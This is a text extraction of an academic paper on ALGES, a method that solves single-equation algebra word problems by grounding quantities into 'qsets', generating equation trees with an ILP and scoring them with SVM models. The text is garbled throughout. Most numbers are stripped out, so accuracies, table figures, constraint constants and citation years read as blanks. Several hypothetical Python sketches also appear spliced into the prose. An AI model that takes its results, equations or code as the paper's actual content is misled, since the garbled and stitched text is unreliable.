unknown . output (t∗,`) figure : overview of our method for solving algebraic word problems. be the set of all possible spans of text in w, φ denote the empty span, and sφ = s∪{φ}. a qset for w is either a base qset or a compound qset. a base qset is a tuple (ent,qnt,adj, loc,vrb,syn,ctr) with: • ent ∈ s: entity or quantity noun (e.g., ‘student’); • qnt ∈ r∪{x}: number or quantity (e.g., or x); • adj ⊆ sφ: adjectives for ent in w; • loc ∈ sφ: location of ent (e.g., ‘in the drawer’); • vrb ∈ sφ: governing verb for ent (e.g., ‘fill’); • syn: syntactic and positional information for ent (e.g., ‘buses’ is in subject position) ; • ctr ⊆ sφ: containers of ent (e.g., ‘bus’ is a con- tainer for the ‘students’ qset). 
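in code, a base qset is simply a small record over these fields. the sketch below is one hypothetical rendering, not the alges implementation: None models the empty span φ, and the example values for the zoo problem in the overview figure are invented placeholders.

```python
# a hypothetical rendering of the base-qset record from the definition above.
from dataclasses import dataclass, field
from typing import List, Optional, Union

@dataclass
class QSet:
    ent: str                                        # entity noun, e.g. "student"
    qnt: Union[float, str]                          # quantity: a number, or "x" for the unknown
    adj: List[str] = field(default_factory=list)    # adjectives modifying ent
    loc: Optional[str] = None                       # location, e.g. "in the drawer"
    vrb: Optional[str] = None                       # governing verb, e.g. "fill"
    syn: Optional[str] = None                       # syntactic/positional information
    ctr: List[str] = field(default_factory=list)    # containers of ent, e.g. ["bus"]

# base qsets for the zoo problem in the overview figure; the numeric values are
# invented placeholders, not the problem's actual numbers.
trip_students = QSet(ent="student", qnt=120, vrb="went", loc="to the zoo")
buses         = QSet(ent="bus", qnt=4, vrb="fill")
car_students  = QSet(ent="student", qnt=8, vrb="travel", loc="in cars")
per_bus       = QSet(ent="student", qnt="x", ctr=["bus"])
```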
properties being φ indicates these optional proper- ties are unspecified. a compound qset is formed by combining two qsets with a non-equality binary op- erator as discussed in section . qsets can be further combined with the equality operator to yield a semantically augmented equation tree. the example in figure has four base qsets extracted from problem text. each possible equation tree corresponds to a different recursive combination of these four qsets. given w, alges first extracts a list of n base qsets s = {s , . . . ,sn} (section ). it then uses an ilp-based optimization method to combine ex- tracted qsets into a list of type-consistent candidate inspired by semantically augmented parse trees (ge and mooney, ) adapted to equational logic. equation trees (section ). finally, alges uses dis- criminative models to score each candidate equation, using both local and global features (section ). specifically, the recursive nature of our represen- tation allows us to decompose the likelihood func- tion p(t,w) into local scoring functions for each in- ternal node of t followed by scoring the root node: p(t|w) ∝  ∏ tj∈t llocal(tj|w)  ×gglobal(t|w) ( ) where the local function llocal(tj|w) scores the like- lihood of the subtree tj, modeling pairwise qset re- lationships, while the global function gglobal(t|w) scores the likelihood of the root of t, modeling the equation in its entirety. learning. alges learns in a weakly supervised fashion, using word problems wi and only their cor- rect answer `i (not the corresponding equation tree) as training data {(wi,`i)}i∈{ ,...,n}. we ground each wi into ordered qsets and generate a list of type-consistent candidate training equations t`i that yield the correct answer `i. we build a local discriminative model llocal to score the likelihood that a math operator op ∈ o can correctly combine two qsets s and s based on their semantics and intertextual relationships. for example, in figure this model learns that ∗ has a high likelihood score for ‘ buses’ and ‘x students’. the training data consists of feature vectors 〈s ,s 〉 labeled with op, derived from the equation trees that yield the correct solution. we also build a global discriminative model that scores equation trees based on the global problem structure: gglobal = ψᵀfglobal(w,t) where fglobal represents global features of w and t, and φ are pa- rameters to be learned. the training data consists of feature vectors 〈w,t〉 for equation trees that yield the correct solution as positive examples, and the rest as negatives (figure ). the details of learning and in- ference steps are described in section . grounding and combining qsets we discuss how word problem text is grounded into an ordered list of qsets. a qset is a compact rep- resentation of the properties of a quantity as de- scribed in a single sentence. the use of qsets facil- itates the building of semantically augmented equa- tion trees. additionally, by tracking certain proper- ties of text quantities, alges can resolve pronomi- nal references or elided nouns to properties of previ- ous qsets. it can also combine information about quantities referenced in different sentences into a single semantic structure for further use. grounding. alges translates the text of the prob- lem w into interrelated base qsets {s , . . . ,sn}, each associated with a quantity in the problem text w. 
the properties of each qset (definition ) are ex- tracted from the dependency parse relations present in the sentence where the quantity is referred to ac- cording to the rules described in table . additionally, alges assigns a single target qset sx corresponding to the question sentence. the properties of the target qset are also extracted ac- cording to the rules of the table . in particular, the qnt property is set to unknown, the ent is set to the noun appearing after the words what, many or much in the target sentence, and the other properties are extracted as listed in table . reordering. in order to reduce the space of possible equation trees, alges reorders qsets {s , . . . ,sn} according to semantic and textual information and enforces a constraint that qsets can only combine with adjacent qsets in the equation tree. in fig- ure , the target qset corresponding to the unknown (x ‘students’) is moved from its textual location at for each quantity mentioned in the text, properties (qnt,ent,ctr,adj,vrb, loc) of the corresponding qset are extracted as follows: . qnt (quantity) is a numerical value or determiner found in the problem text, or a variable. . ent (entity) is a noun related to the qnt in the depen- dency parse tree. if qnt is a numerical value, ent is the noun related by the num, number, or prep of rela- tions. if qnt is a determiner, ent is the noun related via the det relation. when such a noun does not exist due to parse failure or pragmatic recoverability, ent is the noun that is closest to qnt in the same sentence or the ent associated with the most recent qset. . ctr (container) is the subject of the verb govern- ing ent, except in two cases: when this subject is a pronominal reference, the ctr is set to the ctr of the closest previous qset; if ent is related to another qset whose qnt is one of each, every, a, an, per, or one, ctr is set to the ent of that qset. . adj (adjectives) is a list of adjectives related to ent by the amod relation. . vrb (verb) is a governing verb, either related to ent by nsubj or dobj . loc (location) is a noun related to ent by prep on, prep in, or prep at relations. table : the process of forming a single qset. the end of the problem and placed adjacent to the qset with entity ‘buses’. this move is triggered by the relationship between the target entity ‘student’ and its container ‘bus’ that is quantified by each in the last sentence. in addition to the container match rule, we employ three other rules to move the target qset as described in table . combining. two qsets and an arithmetic operator can be combined via the combine function to form a third qset, alternately referred to as a compound. because of this, we can represent intermediate nodes in the equation tree as qsets themselves. the recur- sive combination of qsets allows us to effectively decompose equation trees into a collection of local operations over identical abstractions. this enables learning features of qsets and text that indicate par- ticular operations from both leaf and intermediate nodes. the mechanics of c ← combine(a,b,op) are detailed below. these reordering rules are intentionally minimal, but do provide some gain over both preserving the text ordering of quantities or setting ordering as a soft constraint. see table . . move qset si to immediately after qset sj if the con- tainer of si is the entity of sj and is quantified by each. . move target qset to the front of the list if the ques- tion statement includes keywords start or begin. . 
move target qset to the end of the list if the question statement includes keywords left, remain, and finish. . move target qset to the textual location of an inter- mediate reference with the same ent if its num prop- erty is the determiner some. table : rules for reordering qsets. for op = +, the properties of either qset a or b suffice to define c. alges always forms c using the properties of b in these situations. for op = −, the properties of the left operand a define the resul- tant set, as evidenced by the subtraction operations present in the first problem in table . to determine the stickers in luke’s possession, we need to track stickers related to the left qset with the verb ‘got’. for op = ∗, the qset relationship is captured by the container and entity properties: the one whose properties preserve after multiplication has the other’s entity as its container. in figure , the ‘bus’ qset is the container of ‘students’. when these are combined with the ∗ operator, the result is of en- tity type ‘student’. for op = /, we use the prop- erties of the left operand to encourage a distinction between division and multiplication. generating equation trees with ilp we use an ilp optimization model to generate equa- tion trees involving n base qsets. these equation trees are used for both learning and inference steps. alges generates an ordered list of m of the most desirable candidate equations for a given word prob- lem w using an ilp, which models global consider- ations such as type consistency and appropriate low expression complexity. to facilitate generation of equation trees, we represent them in parenthesis-free postfix or reverse polish notation, where a binary op- erator immediately follows the two operands it op- erates on (e.g., abc+∗x=). given a word problem w with n base qsets (cf. table for notation), we build an optimization model ilp(w) over the space of postfix equations e = e e . . .el of length l involving k numeric constants, k′ = n − k unknowns, r possible binary operators, and q “types” of qsets, where type cor- responds to the entity property of qsets and deter- mines which binary relationships are permitted be- tween two given qsets. for single variable equations over binary operators o, k′ = ,r = |o| = , and l = n− . for brevity, define m = n + r and let [j] denote { , . . . ,j}. expression e can be evalu- ated by considering e ,e , . . . ,el in order, pushing non-operator symbols on to a stack σ, and, for op- erator symbols, popping the top two elements of σ, applying the operator to them, and pushing the result back on to σ. the stack depth of the ei is the stack size after ei has been processed this way. input w input math word problem n number of base qsets k number of numeric constants k′ number of unknowns ( for single-var. eqns.) r number of binary operators (r = |o| = ) m number of possible symbols (n + r) typej type of j-th base qset m desired number of candidate equation trees l desired length of postfix equations ( n− ) output e postfix equation to be generated ei i-th element of e; i ∈ [l] variables for i ∈ [l] xi main ilp variable for i-th symbol of e ci indicator variable: ei is a numeric constant ui indicator variable: ei is an unknown oi indicator variable: ei is an operator di postfix stack depth of ei; di ∈ [l] ti type of ei (corresponds to qset entity); ti ∈ [q] table : ilp notation for candidate equations model variables. integer variables x ,x , . . . ,xl encode which symbol each ei refers to. 
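before the remaining variables are described, the stack-based evaluation just outlined (and the stack depths that the di variables record) can be pictured with a short sketch. this is plain python over a hypothetical postfix expression, not the ilp encoding; the top-level equality operator is left out and would be applied by the caller.

```python
# a minimal sketch of stack-based postfix evaluation and per-symbol stack depth.
OPS = {"+": lambda a, b: a + b, "-": lambda a, b: a - b,
       "*": lambda a, b: a * b, "/": lambda a, b: a / b}

def eval_postfix(symbols):
    """evaluate a postfix expression; also return the stack depth after each symbol."""
    stack, depths = [], []
    for s in symbols:
        if s in OPS:
            second, first = stack.pop(), stack.pop()   # the second operand is the symbol just before
            stack.append(OPS[s](first, second))
        else:
            stack.append(s)                            # numeric constant (a sympy symbol could stand for x)
        depths.append(len(stack))
    assert len(stack) == 1, "ill-formed postfix expression"
    return stack[0], depths

# hypothetical expression a b c + * with a=2, b=3, c=4, i.e. 2 * (3 + 4):
value, depths = eval_postfix([2, 3, 4, "+", "*"])
print(value, depths)    # 14 [1, 2, 3, 2, 1]
```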
their domain, [m], represents the k numeric constants in the same order as their respective qsets, followed by the k′ unknowns, and finally operators in the order +,−,∗,/,=. binary variables ci,ui, and oi indicate whether ei is a numeric constant, unknown, or oper- ator, resp. variables di with domain [l] equal the postfix stack depth of ei. finally, variables ti with domain [q] indicate the type of ei. for j ∈ [n] , i.e., for the k constants and k′ unknowns, typej ∈ [q] denotes the respective qset entity. uncertainty in object types may be incorporated easily by treating typej as a (potentially weighted) subset of [q]. constraints and objective function. constraints in ilp(w) include syntactic validity, type consis- tency, and domain specific simplicity considera- tions. we describe them briefly here, leaving details to the appendix. the objective function minimizes the sum of the weights of violated soft constraints. below, (h) denotes hard constraints, (w) weighted soft constraints, and (p) post-processing steps. definitional constraints (h): constraints over in- dicator variables ci,ui, and oi ensure they repre- sent their intended meaning, including the invariant ci + ui + oi = . for stack depth variables, we add d = and di = di− − oi + for i > . syntactic validity (h): validity of the postfix ex- pression is enforced easily through constraints o = and dl = . in addition, we add xl = m and xi < m for i < l to ensure equality occurs exactly once and as the top-level operator. operand access (h): the second operand of an operator symbol ei is always ei− . its first operand, however, is defined instead by the stack-based eval- uation process. ilp(w) encodes it using an alterna- tive characterization: the first operand of ei is ej iff j ≤ i− and j is the largest index such that di = dj. type consistency (w): suppose t and t are the types of the two operands of an operator o, whose type is to. addition and subtraction preserve the type of their operands, i.e., if o is + or −, then to = t = t . multiplication inherits the type of one of its operands, and division inherits the type of its first operand. in both cases, the two operands must be of different types. formally, if o is ∗, then to ∈ {t ,t } and t = t ; if o is /, then to = t = t . domain considerations (h,w): we add a few do- main specific constraints based on patterns observed in a small subset of the questions. these include an upper bound on the stack depth, which helps avoid overly complex expressions unsuitable for grade- school algebra, and reducing redundancy by, e.g., disallowing the numeric constant to be an operand of + or − or the second operand of /. symmetry breaking (h,w): if a commutative op- erator is preceded by two numeric constants (e.g., ab+), we require the constants to respect their qset ordering. every other pair of constants that disre- spects its qset ordering incurs a small penalty. negative and fractional answers (p): rather than imposing non-negativity as a complex constraint in ilp(w), we filter out candidate expressions yielding a negative answer as a post-processing step. sim- ilarly, when all numeric constants are integers, we filter out expressions yielding a fractional answer, again based on typical questions in our datasets. learning our goal is to learn a scoring function that identifies the best equation tree t∗ corresponding to an unseen word problem w. 
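concretely, that scoring function has the shape of the decomposition given earlier: a product of local likelihoods over a tree's operator nodes, multiplied by a global likelihood for the whole tree, maximized over the ilp's candidate list. the sketch below shows only that combination step; the candidate records and the two stand-in model functions are hypothetical stubs, not the trained classifiers.

```python
# a minimal sketch of combining local and global likelihoods and picking the
# best candidate; the model functions below are hypothetical stubs.
import math

def score(candidate, problem, local_model, global_model):
    log_p = sum(math.log(local_model(node, problem)) for node in candidate["op_nodes"])
    return log_p + math.log(global_model(candidate, problem))

def best_candidate(candidates, problem, local_model, global_model):
    return max(candidates, key=lambda c: score(c, problem, local_model, global_model))

# stub usage: a global stub that happens to prefer trees containing a multiplication.
local_stub  = lambda node, problem: 0.25
global_stub = lambda cand, problem: 0.8 if "*" in cand["op_nodes"] else 0.2
cands = [{"op_nodes": ["+"], "postfix": "a b + x ="},
         {"op_nodes": ["*"], "postfix": "a b * x ="}]
print(best_candidate(cands, "a hypothetical problem", local_stub, global_stub)["postfix"])  # a b * x =
```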
since our dataset consists only of problem-solution pairs {(wi,`i)}i= ,...,n , train- ing our scoring models requires producing equa- tion trees matching `i. for every training in- stance (wi,`i), we use ilp(wi) to generate m type- consistent equation tree candidates ti. to train our local model (section . ), we filter out trees from ti that do not evaluate to `i, extract all (s ,s ,op) triples from the remaining trees, and use feature vec- tors capturing (s ,s ) and labeled with op as train- ing data (see figure ). for the global model, we use for training data a subset of ti with an equal number of correct and incorrect equation trees (section . ). once trained, we use equation to combine these models to compute a score for each candidate equa- tion tree generated for an unseen word problem at inference time (see figure ). . local qset relationship model we train a local model of a probability distribu- tion over the math operators that may be used to combine a pair of qsets. the idea is to learn the correspondence between spans of texts and math op- erators by examining such texts and the qsets of the involved operands. given qsets s and s , the lo- cal scoring function scores the probability of each op ∈ {+,−,∗,/}, i.e., llocal = θᵀflocal(s ,s ) where flocal is a feature vector for s and s . note that either qset may be a compound (the result of a combine procedure). the goal is to learn parameters θ by maximizing the likelihood of the operators be- tween every two qsets that we observe in the train- ing data. we model this as a multi-class svm with an rbf kernel. features. given the richness of the textual possi- bilities for indicating a math operation, the features are designed over semantic and intertextual relation- ships between qsets, as well as domain-specific lex- . single qset features (repeated for b) • what argument of its governing verb is a? • is a a subset of another set? • is a a compound? • math keywords found in context of a • verb lin distance from known verb categories (b only) . relational features between qsets a and b • entity match • adjective overlap • location match • distance in text • lin similarity between verbs governing a and b • is one a subtype of the other? • does one contain the other? . target quantity features • a/b is target qset • a/b entity matches target entity • math keywords in target context . root node features • # of ilp constraints violated by equation • scores of left and right subtrees of root figure : features used for local and global models, for left qset a and right qset b ical features. the feature vector includes three main feature categories (table ). first, single set features include syntactic and po- sitional features of individual qsets. for example, they include indicator features for whether elements of a short lexicon of math-specific terms such as ‘add’ and ‘times’ appear in the vicinity of the set reference in the text. also, following hosseini et al. ( ), we include a vector that captures the dis- tance between the verbs associated with each qset and a small collection of verbs found to be useful in categorizing arithmetic operations in that work, based upon their lin similarity (lin, ). second, relationships between qsets are de- scribed w.r.t. various qset properties described in section . 
these include binary features like whether one qset’s container property matches the other qset’s entity (a strong indicator of multiplication), or the distance between the verbs associated with each set based upon their lin similarity. third, target quantity features check the matching between the target qset and the current qset as well as math keywords in the target sentence. . global equation model we also train a global model that scores equation trees based on the global structure of the tree and the problem text. the global model scores the com- patibility of the tree with the soft constraints intro- duced in section as well as its correspondence with the problem text. we use a discriminative model: gglobal = ψᵀfglobal(w,t) where fglobal are the fea- tures capturing trees and their correspondences with the problem text. we train a global classifier to relate these features through parameters ψ. features fglobal are explained in table . they include the number of violated soft constraints in the ilp, the probabilities of the left and right subtrees of the root as provided by the local model, and global lexical features. additionally, the three local feature sets are applied to the left and right qsets. . inference for an unseen problem w, we first extract base qsets from w. the goal is to find the most likely equation tree with minimum violation of hard and soft con- straints. using ilp(w) over these qsets, we gener- ate m candidate equation trees ordered by the sum of the weights of the constraints they violate. we compute the likelihood score given by eqn. ( ) for each candidate equation tree t, use this as an esti- mate of the likelihood p(t|w), and return the can- didate tree t∗ with the highest score. in eqn. ( ), the score of t is the product of the likelihood scores given by the local classifier for each operand in t and the qsets over which it operates, multiplied by the likelihood score given by the global classifier for the correctness of t. if the resulting equation provides the correct answer for w, we consider inference suc- cessful. experiments this section reports on three experiments: a com- parison of alges with kushman et al. ( )’s template-based method, a comparison of alges with hosseini et al. ( )’s verb-categorization methods, and ablation studies. the experiments are complicated by the fact that alges is limited to sin- gle equations, and the verb categorization method can only handle single-equations without multipli- cation or division. our main experimental result is to show an improvement over the template-based method on single-equation algebra word problems. we further show that the template-based method de- pends on lexical and template overlap between its training and test sets. when these overlaps are re- duced, the method’s accuracy drops sharply. in con- trast, alges is quite robust to changes in lexical and template overlap (see tables and ). experimental setup. we use the stanford de- pendency parser in corenlp . (de marneffe et al., ) to obtain syntactic information used for grounding and feature computation. for the ilp model, we use cplex . . (ibm ilog, ) to generate the top m = equation trees with a maximum stack depth of , aborting exploration upon hitting k feasible solutions or seconds. we use python’s sympy package for solving equa- tions for the unknown. for the local and global mod- els, we use the libsvm package to train svm clas- sifiers (chang and lin, ) with rbf kernels that return likelihood estimates as the score. dataset. 
this work deals with grade-school alge- bra word problems that map to single equations with varying length. every equation may involve mul- tiple math operations including multiplication, di- vision, subtraction, and addition over non-negative rational numbers and one variable. the data is gathered from math-aids.com, k learning. com, and ixl.com websites and a subset of the data from kushman et al. ( ) that maps word problems to single equations. we refer to this dataset as singleeq (see table for example problems). the singleeq dataset consists of problems, , sentences, and , words. baselines. we compare our method with the template-based method (kushman et al., ) and the verb-categorization method (hosseini et al., ). for the template-based method, we use the fully supervised setting, providing equations for each training example. . comparison with template-based method we first compare alges with the template-based method over singleeq. we evaluate both systems these hyper-parameters were chosen based on experimen- tation with a small subset of the questions. a more systematic choice may improve overall performance. template overlap . . . . alges . . . . template-based . . . . error reduction % % % % table : decreasing template overlap: accuracy of alges versus the template-based method on single- equation algebra word problems. the first column corre- sponds to the singleeq dataset, and the other columns are for subsets with decreasing template overlap. lexical overlap . . . . alges . . . . template-based . . . . error reduction % % % % table : decreasing lexical overlap: accuracy of alges versus the template-based method on single-equation al- gebra word problems. the first column corresponds to the singleeq dataset, and the other columns are for sub- sets with decreasing lexical overlap. on the number of correct answers provided and re- port the average of a -fold cross validation. alges achieves % accuracy whereas the template-based method achieves % accuracy, a % relative re- duction in errors (first columns in tables and ). this result is statistically significant with a p-value of . under a paired t-test. lexical overlap. by further analyzing singleeq, we noted that there is substantial overlap between the content words (common noun, adjective, adverb, and verb lemmas) in different problems. for ex- ample, many problems ask for the total number of seashells collected by two people on a beach, with only the names of the people and the number of seashells that each found changed. to analyze the effect of this repetition on the learning methods eval- uated, we define a lexical overlap parameter as the total number of content words in a dataset divided by the number of unique content words. the two “seashell problems” have a high lexical overlap. template overlap. we also noted that many prob- lems in singleeq can be solved using the same template, or equation tree structure above the leaf nodes. for example, a problem which corresponds to the equation ( ∗ ) + and a different problem that maps to ( ∗ ) + share the same template. we introduce a template overlap parameter defined as the average number of problems with the same template in a dataset. results. in our data, template overlap and lexi- cal overlap co-vary. to demonstrate the brittleness of the template-based method simply, we picked three subsets of singleeq where both parame- ters were substantially lower than in singleeq and recorded the relative performance of the template- based method and of alges in tables and . 
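both overlap parameters are simple corpus statistics. the sketch below shows one way to compute them; the content-word lists and template strings are hypothetical simplifications (the paper counts common noun, adjective, adverb, and verb lemmas, and groups problems by the equation-tree structure above the leaf nodes).

```python
# a small illustration of the two dataset statistics defined above, on toy data.
from collections import Counter

def lexical_overlap(problems_content_words):
    """total number of content-word tokens divided by the number of unique ones."""
    tokens = [w for words in problems_content_words for w in words]
    return len(tokens) / len(set(tokens))

def template_overlap(problem_templates):
    """average number of problems sharing the same template."""
    counts = Counter(problem_templates)
    return sum(counts[t] for t in problem_templates) / len(problem_templates)

# hypothetical toy corpus: two near-duplicate "seashell" problems and one other.
content = [["seashell", "find", "beach"], ["seashell", "find", "beach"],
           ["bus", "fill", "student"]]
templates = ["(a + b) = x", "(a + b) = x", "(a * b) + c = x"]
print(lexical_overlap(content), template_overlap(templates))   # 1.5  ~1.67
```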
the data used in both tables is the same, but the ta- bles are separated for readability. the first column reports results for the singleeq dataset, and the other columns report results for the subsets with de- creasing template and lexical overlaps. the subsets consist of , , and questions respectively. we see that as the lexical overlap drops from . to . and as the template overlap drops from . to . , the relative advantage of alges over the tem- plate methods goes up from % to %. while the template-based method is able to solve a wider range of problems than alges, its accu- racy falls off significantly when faced with fewer re- peated templates or less spurious lexical overlap be- tween problems (from . to . ). the accuracy of alges also declines from . to . across the table, which needs to be investigated further. in future work, we also need to investigate additional settings for the two parameters and to attempt to “break” their co-variance. nevertheless, we have uncovered an important brittleness in the template- based method and have shown that alges is sub- stantially more robust. . comparison with verb-categorization the verb-categorization method learns to solve ad- dition and subtraction problems, while alges is ca- pable of solving multiplication and division prob- lems as well. we compare against their method over our dataset as well as the dataset provided by that work, here referred to as addsub. addsub consists of addition and subtraction word problems with the possibility of irrelevant distractor quanti- ties in the problem text. the verb categorization method uses rules for handling irrelevant informa- tion. an example rule is to remove a qset whose ad- jective is not consistent with the adjective of the tar- get qset. we augment alges with rules introduced in this method for handling irrelevant information in addsub. results, reported in table , show comparable accuracy between both methods on hosseini et al. ( ) data. our method shows a significant im- provement versus theirs on the singleeq dataset due to the presence of multiplication and division operators, as % of the problems in our dataset in- clude these operators. method addsub singleeq alges . . verb-categorization . . error reduction - % table : accuracy of alges compared to verb catego- rization method. . ablation study in order to determine the effect of various compo- nents of our system on its overall performance, we perform the following ablations: no local model: here, we test our method absent the local information (section . ). that is, we gen- erate equations using all ilp constraints, and score trees solely on information provided by the global model: p(t|w) ∝gglobal(w,t). no global model: here, we test our method with- out the global information (section . ). that is, we generate equations using only the hard constraints of ilp and score trees solely on information provided by the local model: p(t|w) ∝ ∏ ti∈tllocal(w,ti). no qset reordering: we test our method without the deterministic qset reordering rules outlined in section . instead, we allow the ilp to choose the top m equations regardless of order. results in table show that each component of alges contributes to its overall performance on the singleeq corpus. we find that both the global and local models contribute significantly to the overall system, demonstrating the significance of a bottom- up approach to building equation trees. importance of features. 
we also evaluate the ac- curacy of the local qset relationship model (sec- method accuracy alges . no local model . no global model . no qset reordering . table : ablation study of each component of alges. method accuracy local classifier: full feature set . no single set features . no set relation features . no target features . table : accuracy of local classifier in predicting the cor- rect operator between two qsets and ablating feature sets. tion . ) on the task of predicting the correct op- erator for a pair of qsets 〈s ,s 〉 over the sin- gleeq dataset using a -fold cross validation. ta- ble shows the value of each feature group used in the local classifier, and thus the importance of details of the qset representation. . qualitative examples and error analysis. table shows some examples of problems solved by our method. we analyzed errors made by alges on the singleeq dataset. table summarizes five major categories of errors. problems and equations luke had stickers. he bought stickers from a store in the mall and got stickers for his birthday. then luke gave of the stickers to his sister and used to decorate a greeting card. how many stickers does luke have left? (( + (( + )− ))− ) = x maggie bought packs of red bouncy balls, packs of yellow bouncy balls, and packs of green bouncy balls. there were bouncy balls in each package. how many bouncy balls did maggie buy in all? x = ((( + ) + )∗ ) sam had dollars to spend on books. after buying them he had dollars. how much did each book cost? = (( ∗x) + ) fred loves trading cards. he bought packs of football cards for $ . each, a pack of pokemon cards for $ . , and a deck of baseball cards for $ . . how much did fred spend on cards? (( ∗ . ) + ( . + . )) = x table : examples of problems solved by alges to- gether with the returned equation. parsing errors cause a wrong grounding into the error type example parsing issues ( %) randy needs cupcakes for a birthday party. he already has chocolate cupcakes and vanilla cupcakes. how many more cup- cakes should randy buy? grounding & ordering ( %) there are bicycles and tricycles in the storage at danny’s apartment building. each bicycle has wheels and each tricycle has wheels. how many wheels are there in all? semantic limitation ( %) the sum of three consecutive even numbers is . what is the smallest of these numbers? lack of knowledge ( %) a restaurant sold hamburgers last week. how many hamburgers on average were sold each day? inferring quantities ( %) sara, keith, benny, and alyssa each have baseball cards. how many dozen baseball cards do they have in all? table : examples of different error categories and rel- ative frequencies. sources of errors are underlined. designed representation. for example, the parser treats ‘vanilla’ as a noun modified by the number ‘ ’, leading our system to treat ‘vanilla’ as the en- tity of a qset rather than ‘cupcake’. despite the improvements that come from alges, a portion of errors are attributed to grounding and ordering is- sues. for instance, the system fails to correctly dis- tinguish between the sets of wheels, and so does not get the movement-triggering container relationships right. semantic limitations are another source of er- rors. for example, alges does not model the se- mantics of ‘three consecutive numbers’. the fourth category refers to errors caused due to lack of world knowledge (e.g., ‘week’ corresponds to ‘ days’). finally, alges is not able to infer quantities when they are not explicitly mentioned in the text. 
for ex- ample, the number of people should be inferred by counting the proper names in the problem. conclusion in this work we have outlined a method for solv- ing grade school algebra word problems. we have empirically demonstrated the value of our approach versus state-of-the-art word problem solving tech- niques. our method grounds quantity references, utilizes type-consistency constraints to prune the search space, learns which algebraic operators are indicated by text, and ranks equations according to a global objective function. alges is a hybrid of pre- vious template-based and verb categorization state- based methods for solving such problems. by learn- ing correspondences between text and mathematical operators, we extend the method of state updates based on verb categories. by learning to re-rank equation trees using a global likelihood model, we extend the method of mapping word problems to equation templates. different components of alges can be adapted to other domains of language grounding that re- quire cross-sentence reasoning. future work in- volves extending alges to solve higher grade math word problems including simultaneous equations. this can be accomplished by extending the vari- able grounding step to allow multiple variables, and training the global equation model to recog- nize which quantities belong to which equation. the code and data for alges are publicly available. acknowledgments: this research was supported by the allen institute for ai ( - ), allen distinguished investigator award, and nsf (iis- ). we thank regina barzilay, luke zettle- moyer, aria haghighi, mark hopkins, ali farhadi, and the anonymous reviewers for their helpful com- ments. references yoav artzi and luke zettlemoyer. . weakly su- pervised learning of semantic parsers for mapping in- structions to actions. tacl, ( ): – . jonathan berant, vivek srikumar, pei-chun chen, abby vander linden, brittany harding, brad huang, peter clark, and christopher d. manning. . modeling biological processes for reading comprehen- sion. in emnlp. antoine bordes, nicolas usunier, and jason weston. . label ranking under ambiguous supervision for learning semantic correspondences. in icml, pages – . s. r. k. branavan, harr chen, luke zettlemoyer, and regina barzilay. . reinforcement learning for mapping instructions to actions. in acl/afnlp, pages – . chih-chung chang and chih-jen lin. . libsvm: a library for support vector machines. acm transac- tions on intelligent systems and technology, : : – : . david l. chen, joohyun kim, and raymond j. mooney. . training a multilingual sportscaster: using per- ceptual context to learn language. jair, : – . michael collins. . discriminative reranking for natural language parsing. computational linguistics, ( ): – . marie-catherine de marneffe, bill maccartney, christo- pher d manning, et al. . generating typed de- pendency parses from phrase structure parses. in pro- ceedings of lrec, volume , pages – . yansong feng and mirella lapata. . how many words is a picture worth? automatic caption generation for news images. in acl, pages – . ruifang ge and raymond j mooney. . a statisti- cal semantic parser that integrates syntax and seman- tics. in conference on computational natural lan- guage learning, pages – . ruifang ge and raymond j. mooney. . discrimina- tive reranking for semantic parsing. in acl. d. goldwasser and d. roth. . learning from natural instructions. in ijcai. hannaneh hajishirzi, julia hockenmaier, erik t. mueller, and eyal amir. . 
reasoning about robocup soccer narratives. in uai, pages – . hannaneh hajishirzi, mohammad rastegari, ali farhadi, and jessica k hodgins. . semantic understand- ing of professional soccer commentaries. in uai. ben hixon, peter clark, and hannaneh hajishirzi. . learning knowledge graphs for question answering through conversational dialog. in naacl. mohammad javad hosseini, hannaneh hajishirzi, oren etzioni, and nate kushman. . learning to solve arithmetic word problems with verb categorization. in emnlp, pages – . ibm ilog. . ibm ilog cplex optimization studio . . r koncel-kedziorski, hannaneh hajishirzi, and ali farhadi. . multi-resolution language grounding with weak supervision. in emnlp. nate kushman, yoav artzi, luke zettlemoyer, and regina barzilay. . learning to automatically solve algebra word problems. in acl, pages – . tom kwiatkowski, luke zettlemoyer, sharon goldwater, and mark steedman. . inducing probabilistic ccg grammars from logical form with higher-order unifica- tion. in emnlp, pages – . percy liang, michael i. jordan, and dan klein. . learning semantic correspondences with less supervi- sion. in acl/afnlp, pages – . dekang lin. . an information-theoretic definition of similarity. in icml, volume , pages – . fei liu, jeffrey flanigan, sam thomson, norman sadeh, and noah a. smith. . toward abstractive sum- marization using semantic representations. in naacl. cynthia matuszek, evan herbst, luke zettlemoyer, and dieter fox. . learning to parse natural lan- guage commands to a robot control system. in proc. of the th international symposium on experimental robotics (iser), june. arindam mitra and chitta baral. . learning to au- tomatically solve logic grid puzzles. in emnlp. d. roth and w. yih. . a linear programming formu- lation for global inference in natural language tasks. in hwee tou ng and ellen riloff, editors, conll, pages – . association for computational linguistics. subhro roy, urbana champaign, and dan roth. a. solving general arithmetic word problems. in emnlp. subhro roy, tim vieira, and dan roth. b. reason- ing about quantities in natural language. tacl. min joon seo, hannaneh hajishirzi, ali farhadi, and oren etzioni. . diagram understanding in ge- ometry questions. in aaai. minjoon seo, hannaneh hajishirzi, ali farhadi, oren et- zioni, and clint malcolm. . solving geometry problems: combining text and diagram interpretation. in emnlp. shuming shi, yuehui wang, chin-yew lin, xiaojiang liu, and yong rui. . automatically solving num- ber word problems by semantic parsing and reasoning. in emnlp. v. srikumar and d. roth. . a joint model for ex- tended semantic role labeling. in emnlp, edinburgh, scotland. mark yatskar, lucy vanderwende, and luke zettle- moyer. . see no evil, say no evil: description generation from densely labeled images. lexical and computational semantics (* sem ), page . john m zelle and raymond j mooney. . learn- ing to parse database queries using inductive logic pro- gramming. in aaai, pages – . luke s. zettlemoyer and michael collins. . learn- ing to map sentences to logical form: structured clas- sification with probabilistic categorial grammars. in uai, pages – . lipu zhou, shuaixiang dai, and liwei chen. . learn to solve algebra word problems using quadratic programming. in emnlp. appendix: ilp model details figure summarizes various constraints of our ilp model for generating candidate equations. op idxi is an auxilary variable whose value, when xi is an op- erator, is the index in the postfix expression of the first operand of xi. 
